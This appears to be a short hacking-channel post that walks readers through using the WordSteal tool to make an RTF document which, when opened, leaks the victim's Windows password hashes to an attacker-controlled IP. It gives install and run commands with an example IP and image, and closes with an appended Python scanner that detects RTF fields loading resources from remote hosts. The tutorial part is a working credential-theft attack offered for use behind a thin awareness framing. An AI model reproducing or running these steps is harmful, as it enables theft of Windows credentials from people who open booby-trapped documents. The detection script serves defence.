Hiding the password stealer in the document!


Hey Freaks! The DeepNet here. So, have you ever thought that when you download and open a document, an unpleasant surprise, or rather a virus, may be waiting for you there? If not, it's time to start checking documents too; it's the 21st century, after all.


 And today I will clearly show how scammers can embed a stealer into an RTF file using the WordSteal utility.


 When a user opens such a file, the "hacker" automatically receives hashes of Windows passwords.


🔸 Instructions

 

◾1. First you need

 Metasploit, Linux, Termux


 ◾2. Then we install our utility:

 • apt install python git

 • git clone https://github.com/0x09AL/WordSteal.git

 • cd

 • chmod + x main.py


 ◾3. To launch it you need a picture. Either give the absolute path to it, or put it in the same folder as the script and give only its name:

 • python main.py your_IP picture_name 1


 Example:

 • python main.py 128.0.0.1 kredo.jpg 1


 If everything went well, the RTF with the embedded payload should appear in the folder. Do not close the terminal!

 Next, someone has to open this file, and all the password hashes will arrive in our terminal!
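
For the "start checking documents" advice above, here is a small scanner that flags RTF files whose fields load a resource from another host. It is an added example, not part of the original post or of WordSteal. It assumes the generated document pulls its picture through an INCLUDEPICTURE-style field pointing at the remote IP; the sample documents and addresses are constructed.

```python
import re

# RTF escapes that can hide a path: \\ \{ \} and \'hh (hex byte).
_ESC = re.compile(rb"\\(?:'([0-9a-fA-F]{2})|([\\{}]))")
# Word fields that load an external resource when the document is opened.
_FIELD = re.compile(
    r'\b(INCLUDEPICTURE|INCLUDETEXT)\b\s+(?:"([^"]+)"|([^\s}]+))', re.I)
# Targets on another host: file://host/..., UNC \\host\..., http(s)://host/...
# file:///C:/... (empty host) is local and deliberately not matched.
_REMOTE = re.compile(
    r'^(?:file:(?://|/{4,})(?=[^/])|\\{2,}|https?://)([^/\\:]+)', re.I)

def unescape_rtf(data: bytes) -> str:
    """Undo RTF character escapes so hidden slashes and hosts become visible."""
    def repl(m):
        return bytes([int(m.group(1), 16)]) if m.group(1) else m.group(2)
    return _ESC.sub(repl, data).decode("latin-1")

def remote_field_targets(data: bytes):
    """Return (field, target, host) for every field that points off-host."""
    if not data.lstrip().startswith(b"{\\rtf"):
        return []  # not an RTF document
    hits = []
    for m in _FIELD.finditer(unescape_rtf(data)):
        target = m.group(2) or m.group(3)
        remote = _REMOTE.match(target)
        if remote:
            hits.append((m.group(1).upper(), target, remote.group(1)))
    return hits

# Constructed samples (192.0.2.10 is a documentation-only address).
SAMPLE_REMOTE = (rb'{\rtf1{\field{\*\fldinst {INCLUDEPICTURE '
                 rb'"file://192.0.2.10/logo.jpg" \\* MERGEFORMAT\\d}}{\fldrslt}}}')
SAMPLE_UNC = (rb'{\rtf1{\field{\*\fldinst {INCLUDEPICTURE '
              rb'"\\\\\\\\files.example\\\\share\\\\a.png"}}}}')
SAMPLE_LOCAL = rb'{\rtf1{\field{\*\fldinst {INCLUDEPICTURE "file:///C:/img/a.png"}}}}'

if __name__ == "__main__":
    for name, doc in [("remote", SAMPLE_REMOTE), ("unc", SAMPLE_UNC),
                      ("local", SAMPLE_LOCAL)]:
        print(name, remote_field_targets(doc) or "no remote field targets")
```

A hit is a reason to quarantine the file before anyone opens it. RTF that splits the field name with control words will slip past these regular expressions and needs a full RTF parser.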